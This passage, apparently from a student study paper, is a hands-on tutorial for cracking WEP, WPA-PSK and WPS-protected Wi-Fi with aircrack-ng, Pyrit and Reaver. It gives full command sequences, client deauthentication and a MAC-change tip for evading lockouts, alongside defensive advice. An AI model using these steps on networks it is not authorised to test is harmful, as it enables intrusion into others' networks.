Don't worry if you fail, try again with more IVs. Remember that you'll need more IVs depending on how big the key is. There is no way to tell the size of the key from the air, so try with 50 000; if you fail try with 200 000, and if you fail again get more, and you'll get there. The point here is that you are doing it the right way; if you fail it is for lack of IVs and not because you're doing it wrong.

All of the captured data packets containing IVs are stored in the files that I named wepkey, written by airodump-ng. The program will write multiple files to the current directory in different formats, but we are looking for the .cap files.

Airodump-ng can create more than one .cap file, I mean wepkey-01.cap, wepkey-02.cap...

So, when you're ready, use the command:

#aircrack-ng -b 00:80:5A:28:B5:AB wepkey*.cap


Figure 7. Using aircrack-ng to get the WEP key

So as you can see it found the WEP key of the network. The key I used for this example was “1234567890” and as you see in aircrack-ng's output “KEY FOUND! [12:34:56:78:90]”

As I told you before, do not use WEP. It is only marginally better than an open network, since casual users cannot join, but anyone with these tools gets the key in minutes, with or without clients connected, so it is not a secure way to protect your network.


Cracking WEP (Shared Key)

So, now let's crack a WEP network using the Shared Key system.

For this example we will always need a connected client. If the network doesn't have a connected client just wait until someone connects to the network. We need someone from inside the network to show up because we will need the 140 byte keystream from their shared key authentication to fake an authentication of our own. Without that we cannot authenticate. Remember that Open System authentication and Shared Key authentication work differently.

So after we authenticate we need to perform a fragmentation or a chopchop attack to get a fragment of keystream to create a packet to inject in the airwaves. After that it is like cracking WEP with Open System: wait and get enough IVs to crack the key.

First of all, as always, put your wireless card in monitor mode.

#airmon-ng start wlan0

Then let's look at our network, WLAN will be the target network.

#airodump-ng -c 11 --bssid 00:80:5A:28:B5:AB -w wepska wlan0

Figure 8. Using airodump-ng to scan for networks

Using this we will sniff all the packets from the WLAN network and save them in files called wepska. We will need to perform a deauthentication on an authenticated client (the same aireplay-ng -0 command used in the Fake Authentication chapter) in order to capture the shared key 140 byte keystream when it authenticates again.


Figure 9. Performing a deauth to a client

After you perform the deauthentication and the client authenticates again, look at the top line in the airodump-ng window: there is now a text saying “140 bytes keystream: 00:80:5A:28:B5:AB”

This means we have captured the .xor file we were looking for to perform a fake authentication.

Use the following command:

#aireplay-ng -1 0 -a 00:80:5A:28:B5:AB -c 00:15:AF:A2:8D:98 -y wepska-01-00:80:5A:28:B5:AB.xor wlan0

-y is the keystream file captured by airodump-ng. Since no -h is given, the card's own MAC address (74:EA:3A:90:C7:21 in my case) is the one that gets authenticated, and it must be the same address we use in the fragmentation and injection steps below.

Remember to always change the file names from what I have to what you get. They might be different.

Figure 10. Performing a Fake authentication


Now we will perform a fragmentation attack. Use the next command:

#aireplay-ng -5 -b 00:80:5A:28:B5:AB -h 74:EA:3A:90:C7:21 wlan0

-5 means the fragmentation attack, -b is the access point MAC address and -h is our card's MAC address, which must be the one we fake authenticated with.

Figure 11. Performing a fragmentation in order to get a fragment of a packet to create an arp-request

Wait until you get a packet to use in the attack. When the system asks you “Use this packet?” press “y” and then ENTER to use it, and you will get a fragment of keystream that we will use to create an ARP request.

Basically this is the same as we did before on WEP Open System without connected clients.

Figure 12. Getting the fragment


As you can see in the output of the fragmentation attack you now have a file called fragment-0921-140138.xor or something similar.

Let's now create an ARP request. Use the following command:

#packetforge-ng -0 -a 00:80:5A:28:B5:AB -h 74:EA:3A:90:C7:21 -k 255.255.255.255 -l 255.255.255.255 -y fragment-0921-140138.xor -w arp-request

This command will create an ARP request encrypted with the keystream in that fragment. Now we need to inject that packet in the airwaves and it will provoke the AP to rebroadcast it with new IVs.

#aireplay-ng -2 -b 00:80:5A:28:B5:AB -h 74:EA:3A:90:C7:21 -r arp-request wlan0

You should have the “airodump-ng” window sniffing and saving the files; as I set it up above, those packets are being saved in the “wepska*.cap” files. When we have enough IVs we will crack the WEP key.

Figure 13. Sending the arp-request

OK, when you have around 50 000 IVs, let's run the attack:

#aircrack-ng -b 00:80:5A:28:B5:AB wepska*.cap


Figure 14. Using aircrack-ng

As you can see the key was successfully cracked. The key for this example was 1234567890 and as you can see in the image “KEY FOUND! [12:34:56:78:90]”. So this is everything about WEP. Let's see now the WPA part of this tutorial.

Even though it takes one more step to attack, WEP with Shared Key authentication is no more secure than Open System; the authentication exchange itself hands an attacker 140 bytes of keystream, so it is still an insecure choice for your network. WPA2 is the solution.


Cracking WPA with Dictionary Attack (Aircrack-ng)

After WEP was proven to be completely breakable, WPA emerged as its successor. It uses a much stronger design: each client gets its own session keys derived during a handshake, per-packet keys are mixed so that no keystream is reused, and there is a real message integrity check instead of a CRC. It doesn't matter if you collect a big amount of packets, you can't crack it that way.

Most consumers use what is called WPA Personal (WPA-PSK), which utilizes a pre-shared key (PSK), a common passphrase shared across all devices and used for authentication.

When a client wants to associate with a WPA encrypted network, a four-way handshake takes place. Briefly, what occurs is this: both sides already hold the Pairwise Master Key (PMK), which is derived from the passphrase and the SSID with PBKDF2 (4096 iterations of HMAC-SHA1). The AP sends the client a random number (the ANonce); the client generates its own random number (the SNonce), derives the Pairwise Transient Key (PTK) from the PMK, both nonces and both MAC addresses, and sends the SNonce back together with a Message Integrity Code (MIC) computed with part of the PTK. The AP derives the same PTK and checks the MIC; if it matches, the AP sends the group key and a confirmation, both sides install the session keys, and the client is successfully associated and able to decrypt the packets.

The packets are encrypted with these session keys, not with the passphrase. This is what is known as the four-way handshake between a client and the AP.

Unlike WEP, there is not enough information contained in the data packets to find the key. No matter how long an attacker sniffs the network and intercepts packets, he will never be able to crack the passphrase from them. However, within the four-way handshake there is enough information to test passphrase guesses offline: the nonces and MAC addresses are sent in the clear, so for every candidate passphrase the attacker can derive the PMK and the PTK and check whether the MIC matches.

The basic steps for cracking a WPA Personal encrypted network are:

1) Discover the network and be within range to intercept packets.

2) Start sniffing the network for the four-way handshake and capture it when it arises.

3) Wait for a new client to authenticate or deauthenticate a current client.

4) Brute force the captured handshake file with a dictionary file.

So the first thing to do is to put your wireless card in monitor mode:

#airmon-ng start wlan0

Next you will search for networks within range to intercept and inject packets.

#airodump-ng wlan0


Figure 15. Using airodump-ng

So let's break into WLAN.

WLAN's BSSID is 00:80:5A:28:B5:AB and it is on channel 11; that's all we need to start sniffing packets waiting for the four-way handshake. To begin sniffing use the following command:

#airodump-ng --bssid 00:80:5A:28:B5:AB -c 11 -w wpakey wlan0

So we are now sniffing packets from the WLAN network and saving them (-w) into a file named wpakey. Just like for WEP networks we will need that file later, and once again we are interested in the *.cap file. Locking the channel with -c matters here: if airodump-ng keeps hopping between channels it can miss one of the four handshake messages.

So, right now you either wait for a new client to connect to the network, if no one is connected already, or you can deauthenticate a connected client, forcing him to authenticate again, and by doing this you sniff the four-way handshake between the client and the wireless AP.

Let's do it with an already authenticated client, with the following MAC address: 00:15:AF:A2:8D:98.

Figure 16. Looking for a client to deauth


So let’s deauthenticate the client with the next command:

#aireplay-ng --deauth 25 -a 00:80:5A:28:B5:AB -c 00:15:AF:A2:8D:98 wlan1

When the client connects again you will get the four-way handshake; the airodump-ng window shows that you got it in the top right corner of the console.

Figure 17. Sending Deauth packets

The number after --deauth is the number of deauthentication packets aireplay-ng will send. A higher number will increase the probability of it working, but is less stealthy.

The deauthentication was done and now we have the four-way handshake. Once the handshake has been captured, the attacker can stop capturing packets. The information contained in the handshake is all that is needed to crack the WPA passphrase.

Once the attacker has the handshake it is possible to crack the passphrase through brute-force or dictionary techniques. The dictionary technique uses a word list and goes through each word one at a time, encrypting it with the other data gathered (the SSID and others) to see if it matches. When a match occurs, the word from the list is the passphrase used.

This can be extremely time consuming, depending on the complexity of the passphrase, the size of the dictionary file and the speed of your CPU. An attacker is limited by his processor speed in how many passwords he can try per second. With dictionary files containing millions and millions of different combinations of letters and words, the process could take a very long time.


Fortunately, most consumers choose simple, easy to remember passphrases that can be recovered using smaller dictionary files containing common names and passwords.

The program aircrack-ng can be used to crack the handshake. The attacker must have a word list on his system. Backtrack includes several wordlists of different sizes, and larger ones can be downloaded from the internet.

To use a word list with aircrack-ng and our captured handshake use this command:

#aircrack-ng -w /pentest/passwords/wordlists/wpa.txt wpakey*.cap

The output will look like this when aircrack-ng gets the password:

Figure 18. Key found w/ Dictionary attack

It took a little more than 20 minutes to discover the wireless AP passphrase, and the attacker now has the ability to get inside the network. It took 954864 guesses to discover the password. The dictionary file that I used could be considered a big dictionary. You might not be able to avoid a successful attack by a determined attacker, but you sure can make his work a lot harder if you use a strong password.


Cracking WPA using Pyrit’s Database Attack

The next type of attack that I’ll cover is one where you import many dictionaries into a database and then perform an attack with all the passwords in that database. So first let’s install a suite called Pyrit, because it is not included in Backtrack.

Installing pyrit

Do the following at the terminal:

svn checkout http://pyrit.googlecode.com/svn/trunk/ pyrit_svn

Then do this:

sudo apt-get install libssl-dev

sudo apt-get install scapy

sudo apt-get install python-dev

Browse to pyrit directory:

cd /pyrit_svn/pyrit

And type:

sudo python setup.py build

sudo python setup.py install

Ok, now you have Pyrit installed and it should be up and running. I will be using Pyrit together with aircrack-ng.

So first of all, put the wireless card in monitor mode. Let’s use the aircrack-ng suite until we get the handshake.

First use:

#airmon-ng start wlan0

Then use:

#airodump-ng wlan0


Figure 19. Using airodump-ng

So at this point you should have all the information about the network you will try to attack. For this example we will attack a WPA encrypted network with WLAN as the ESSID, 00:80:5A:28:B5:AB as the BSSID, operating on channel 11.

Now we should begin sniffing only this network by using the following command:

#airodump-ng --bssid 00:80:5A:28:B5:AB -c 11 -w wpahandshake wlan0

This will sniff the packets from WLAN and save them (-w) in a file called wpahandshake. Once again, remember that we will be looking for the *.cap file in the end.

If a client is connected to the network, perform a deauthentication attack so the client needs to re-authenticate and you get the handshake; if no one is connected, wait for someone to connect.

#aireplay-ng -0 10 -a 00:80:5A:28:B5:AB -c 00:15:AF:A2:8D:98 wlan1

Now that you have the handshake, let’s use pyrit.

Let’s analyze our handshake file, use the following command in the command line:

#pyrit wpahandshake*.cap analyze

Note that wpahandshake*.cap matches the files that airodump-ng saves with the packets sniffed from the “victim’s” network; they could be wpahandshake-01.cap, wpahandshake-02.cap…

You should get a window like this:


Figure 20. Analyzing handshake with Pyrit

The output says that the access point has the MAC 00:80:5A:28:B5:AB with WLAN as the ESSID. It also says that the file captured a handshake from the client with MAC address 00:15:AF:A2:8D:98.

So now let’s start working with Pyrit’s database.

As you may know, guessing the password used in WPA-PSK and WPA2-PSK is a computationally intensive task. During this process, 100% of your CPU is being used to compute what is known as the Pairwise Master Key, a 256-bit key derived from the ESSID and a password using the PBKDF2-HMAC-SHA1 algorithm. One of the major weaknesses of WPA-PSK is that the Pairwise Master Key has no elements that are unique to the moment of the key negotiation between Access Point and Station. It is therefore possible to pre-compute the Pairwise Master Key and store it for later use.

This is where Pyrit’s database kicks in. It can store ESSIDs, passwords and their corresponding Pairwise Master Keys, possibly growing to the size of hundreds of millions of entries. Starting with a fresh installation of Pyrit, your database will most probably be empty.
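As an added example (not code from this tutorial or from Pyrit), the following Python derives the Pairwise Master Key exactly as described above and models an ESSID-bound PMK store like Pyrit’s database, which also serves the dictionary-attack explanation earlier; the ESSIDs and wordlist entries are constructed sample values, and a unique ESSID is shown to leave a pre-computed table useless.

```python
import hashlib
import hmac

# Added example, not code from the tutorial or from Pyrit: derives the WPA-PSK
# Pairwise Master Key as described above and models an ESSID-bound PMK store.
# All ESSIDs and wordlist entries here are constructed sample values.


def wpa_pmk(passphrase: str, essid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, salt=ESSID, 4096 rounds, 256 bits).

    No nonce or MAC address from the four-way handshake enters this
    calculation, which is exactly why the result can be pre-computed.
    """
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)


def wpa_password_ok(passphrase: str) -> bool:
    """A WPA/WPA2 passphrase must be 8 to 63 printable ASCII characters."""
    return 8 <= len(passphrase) <= 63 and all(32 <= ord(c) <= 126 for c in passphrase)


class PmkStore:
    """Toy stand-in for Pyrit's (ESSID, password) -> PMK database."""

    def __init__(self):
        self.passwords = set()   # like 'import_passwords': deduplicated, filtered
        self.pmks = {}           # (essid, password) -> PMK, filled by batch()

    def import_passwords(self, words):
        self.passwords.update(w for w in words if wpa_password_ok(w))
        return len(self.passwords)

    def batch(self, essid):
        """Pre-compute the PMK of every stored password for one ESSID."""
        for pw in self.passwords:
            self.pmks.setdefault((essid, pw), wpa_pmk(pw, essid))
        return sum(1 for e, _ in self.pmks if e == essid)

    def find_password(self, essid, pmk):
        """Return the password whose cached PMK for ESSID equals pmk, else None."""
        for (e, pw), cached in self.pmks.items():
            if e == essid and hmac.compare_digest(cached, pmk):
                return pw
        return None


def demo():
    """A weak PSK on a common ESSID is found; the same table is useless elsewhere."""
    store = PmkStore()
    # constructed wordlist: "short" is rejected, the repeated "security" is dropped
    store.import_passwords(["short", "security", "password1", "security", "letmein123"])
    store.batch("WLAN")
    hit = store.find_password("WLAN", wpa_pmk("security", "WLAN"))
    # A distinctive ESSID (constructed) has no cached entries: a fresh batch run
    # over the whole wordlist would be needed before any lookup can succeed.
    miss = store.find_password("WLAN-7f3a", wpa_pmk("security", "WLAN-7f3a"))
    return hit, miss


if __name__ == "__main__":
    print(demo())  # ('security', None)
```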

Issue the following command to get an overview:

#pyrit eval

And you will get this output:


root@bt:~# pyrit eval
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Connecting to storage at 'file://'... connected.
Passwords available: 0

Let’s use a command to import some passwords to our database:

#pyrit -i /pentest/passwords/wordlists/wordlist.txt import_passwords

Note that “/pentest/passwords/wordlists/wordlist.txt” is the path where I have stored a wordlist. You can import dozens of dictionary files; Pyrit ensures that duplicate passwords are not stored again in the database, and it also doesn’t store passwords that are not suitable as a WPA/WPA2 password.

After you imported the passwords to the database, use this command again:

#pyrit eval

You should get an output like this:

Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Connecting to storage at 'file://'... connected.
Passwords available: 989532

Now that we have some passwords in the database, we have to create an ESSID; for that, use the following command:

#pyrit -e WLAN create_essid

Note that WLAN is our “victim’s” ESSID.

Pyrit’s output will say that ESSID WLAN was created successfully, and if you use the “eval” command again it will show that the WLAN ESSID doesn’t have any passwords pre-computed yet.

So we already have some passwords in the database and we have an ESSID created; now we need to pre-compute the passwords for that ESSID. This process could take some minutes, depending on how many passwords you have imported into the database.

To pre-compute the passwords with the ESSID you just created use this command:

#pyrit batch

Pyrit will give the output “Batchprocessing done” when it completes the process.


We can now use the Pairwise Master Keys stored in the database to attack the same handshake as in the example above. Instead of running a “passthrough-attack”, where the database is not touched at all, we issue a “database-attack” like the following:

#pyrit -r wpahandshake*.cap attack_db

Don’t forget that wpahandshake*.cap is the file where the handshake is stored and that the “-r” parameter tells Pyrit to read that file. You should have the following output.

Figure 21. Cracking WPA with Pyrit database attack

This process is much faster than a dictionary attack: as you can see in the image above, Pyrit was trying 515375 passwords per second and reported that the password is “security”. This method only costs more time up front, pre-computing the passwords with the ESSID, but it is useful when you have to use many dictionaries at the same time.

Alright, I’ve been telling you to use WPA and still it got hacked. However, it would take ages to hack a good PSK even with a HUGE dictionary. So always use a strong password.


Cracking a Network with Hidden ESSID (aircrack-ng + pyrit)

Cracking a network with a hidden ESSID is pretty simple; you have already done all the steps needed for it. It is possible to do it with aircrack-ng only. The reason I do it with aircrack-ng and Pyrit is that I already have the ESSID WLAN, which is the ESSID I’ve been using in these tutorials, in Pyrit’s database, which makes the process faster than using aircrack-ng’s dictionary attack. So, do not think that it is only possible with Pyrit. Let’s get going… I’ll show it on a WPA network; if you try it on a WEP network it’s the same, but you need to perform the deauthentication and then go back to the WEP method.

The first step in all of our tutorials:

#airmon-ng start wlan0

After this lets search for networks:

#airodump-ng wlan0

Figure 22. Searching for the network that has a hidden ESSID

As you can see there is a network with a strange ESSID, something like <length: 1>. This is a hidden ESSID, and we’ll be able to find out the real ESSID by performing a deauthentication of one of the connected clients.

Let’s sniff only the hidden network’s packets:

#airodump-ng --bssid 00:80:5A:28:B5:AB -c 11 -w hiddenwpa wlan0

Let’s deauthenticate a client now:

#aireplay-ng -0 10 -a 00:80:5A:28:B5:AB -c 00:15:AF:A2:8D:98 wlan0


So, now that you deauthenticated a client you should have something like this:

Figure 23. Performing a deauthentication of a client to uncover the ESSID and to obtain a handshake

As you can see, the network ESSID has now changed to WLAN; by doing this we also got a handshake, so let’s now crack the password:

#pyrit -e WLAN -r hiddenwpa-01.cap attack_db

Figure 24. Getting network's password with pyrit

This time we needed to add the “-e” parameter, since with a hidden ESSID Pyrit can’t guess it. And we have the password: it is security.

Hiding the ESSID is not enough.


Attacking WPA Networks using Wi-Fi Protected Setup

Wi-Fi Protected Setup is an optional certification program developed by the Wi-Fi Alliance, designed to ease the setup of security-enabled Wi-Fi networks in home and small office environments.

Wi-Fi Protected Setup supports methods (pushing a button or entering a PIN into a wizard-type application) that are familiar to most consumers to configure a network and enable security.

Reaver is the application that exploits WPS which I will use to cover this attack. It implements a brute-force attack against WPS, trying PINs in order to recover WPA/WPA2 passphrases.

The PIN is 8 digits long. Doing the math, that gives 10^8 = 100 000 000 PIN combinations.

However, an attacker can derive information about the correctness of parts of the PIN from the AP’s responses.

1. If the attacker receives an EAP-NACK message after sending M4, he knows that the 1st half of the PIN was incorrect.

2. If the attacker receives an EAP-NACK message after sending M6, he knows that the 2nd half of the PIN was incorrect.

This form of authentication dramatically decreases the maximum number of authentication attempts needed from 10^8 = 100 000 000 to 10^4 + 10^4 = 20 000.

As the 8th digit of the PIN is always a checksum of digits one to seven, there are at most 10^4 + 10^3 = 11 000 attempts needed to find the correct PIN.

Reaver has been designed to be a robust and practical attack against WPS, and has been tested against a wide variety of access points and WPS implementations. On average Reaver will recover the target AP's plain text WPA/WPA2 passphrase in 4-10 hours, depending on the AP. In practice, it will generally take half this time to guess the correct WPS PIN and recover the passphrase.


Below there is a flowchart that explains the method used by the brute-force attack on the WPS flaw:


I want to make it clear that this will only work on networks with WPS enabled. Since the router I’ve been using doesn’t have WPS, I will use a new one with the same configuration (ESSID and passphrase).


But you don’t need to worry, I’ll cover how to check if an AP has WPS enabled or not.

First of all, download Reaver. It doesn’t come with Backtrack, so you have to install it, though it is easy to do.

You can download Reaver at http://code.google.com/p/reaver-wps/downloads/list

After the download, extract the Reaver folder to your desktop or to whatever other folder you want.

By the way, Reaver is only supported on the Linux platform and requires the libpcap and libsqlite3 libraries.

After you have extracted the folder, browse to it. Let’s do it as if I had extracted it to my Desktop folder.

In the shell, browse to the following directory:

#cd /root/Desktop/reaver-1.3/src/

Within this directory you will find several files.

Let’s start the installation, run the following command:

# ./configure

If you get this error: “bash: ./configure: Permission denied”

Use the command:

#chmod +x configure

This will give execute permission to the file “configure”.

Try again, this time you won’t have any problems.

# ./configure

Let it run; when it finishes use the following command:

# make

And then:

# make install

Ok, Reaver is installed.

Now we can have some fun with Reaver. Let’s start the attack.

The first thing to do is to put your wireless card in monitor mode:


#airmon-ng start wlan1

Then let’s sniff some beacon frames and save them in an output file:

#airodump-ng -w beacons mon0

Let airodump-ng run for a while; 1 minute is enough. Don’t forget to use the -w option to save the packets you’re getting to a file. What we want are beacon frames, so don’t worry about data packets.

Then you will run the following command:

# walsh -C -f beacons-*.cap

Walsh will look at the cap files that airodump-ng created with the beacon frames and will give you a list of the networks that have WPS enabled.

Then run:

#airodump-ng mon0

Check which channel your target is running on.

Now launch reaver:


#reaver -i mon0 -b 00:24:17:DB:BF:F6 -c 1 -vv

-vv enables verbose mode, so you can see the progress and the warnings.
-b is the BSSID of the target network.
-c is the channel that the network is broadcasting on.


You can use aircrack-ng’s fake authentication while running Reaver; it’s up to you. If you start getting blocked by the AP, use the macchanger command to change your MAC address and start again.

After some hours running Reaver, you will get to the passphrase.

As you can see, we got the passphrase which in this case was “security”.

In this particular situation WPA is cracked even if you have a good password, although by disabling WPS on your router you will eliminate this flaw.


Conclusions

When I started this Independent Study I had a rough idea of what I wanted to research and learn about, and it was a very rewarding experience. I’ve learned more than I was expecting and I really enjoyed the time I took learning and practicing.

I read books and websites and watched videos by which I guided myself, but still, I thought about writing my own paper as a second method of study.

I took the leap after I found a paper like this one, and I really wanted, in return, to write a paper of my own, so that others who are in the same situation I was in some months ago could learn from a simple and pleasant read, since I wrote this paper as I was learning from zero.